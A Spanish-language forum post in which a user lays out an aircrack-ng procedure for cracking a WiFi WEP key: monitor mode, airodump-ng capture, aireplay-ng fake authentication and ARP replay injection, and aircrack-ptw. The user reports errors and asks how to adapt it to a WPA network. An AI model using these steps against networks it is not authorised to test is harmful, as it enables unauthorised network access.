Hola. Estoy armando un procedimiento basado en diferentes fuentes. Aunque parece que los mejores resultados se logran con el Wifiway 1.0 te muestro el procedimiento que armé basado en dos tutoriales similares y que he usado en wifislax 3.1:
En una terminal:
1.
iwconfig para revisar todas las interfaces disponibles. Alli reviso el nombre de mi interface inalambrica. Debe ser wifi0 o wlan0 o eth0 o eth1... En mi caso aparecio como eth1.
2.
ifconfig <interface> up para activar la interface
3.
ifconfig para ver los resultados
4.
iwconfig <interface> mode monitor *
5.
iwconfig <interface> rate 1M determina la tasa de transferencia
6.
airodump-ng <interface> para ver las redes y tomar los datos requeridos mas adelante. Se detiene con Ctrl+C.
7.
airmon-ng start <interface> <canal> **
8.
airodump-ng -c <canal> -w <archivo_captura> <interface> captura de paquetes
9.
aireplay-ng -1 0 -a <BSSID> -h <MACNUESTRO> -e <ESSID> <interface> en otra consola para asociarnos al AP ***
10.
aireplay-ng -3 -b <BSSID> -h <MACNUESTRO> <interface> en otra consola para hacer subir el valor de paquetes en la consola que esta corriendo el airodump
11.
aircrack-ptw <archivo_captura>.cap para sacar la clave
Notas:* Se supone que esto es para poner la tarjeta en modo monitor...
** Este paso lo encontre en un tutorial muy complejo pero fue el que me permitió por primera vez ver un valor diferente de 0 en #Data y con un mejor resultado en wifiway 1.0.
*** En las fuentes consultadas usan indistintamente los términos "asociarnos al AP" e "inyectar". En este paso cae el número de paquetes por segundo y falla: "write failed: Cannot allocate memory"
. En otro intento sucede esto:
Sending Authentication Request (Open System) [ACK]
Authentication successful
Sending Association Request [ACK]
Denied (Code 1), is WPA in use?
Preguntas para todos:
- Donde debo poner el comando: airmon-ng start <interface> <canal>?
Que diferencias o equivalencias existen entre: modo monitor, modo promiscuo y "preparar para inyectar"?
Los términos "asociarnos al AP" e "inyectar", son equivalentes?
Denied (Code 1), is WPA in use?, me pregunta si esta en uso WPA. La clave que tengo establecida es WPA y no WEP. Donde le especifico al programa que la clave es WPA?. Los tutoriales consultados son para sacar claves WEP...
Un saludo para todos. estoy a la espera de su ayuda...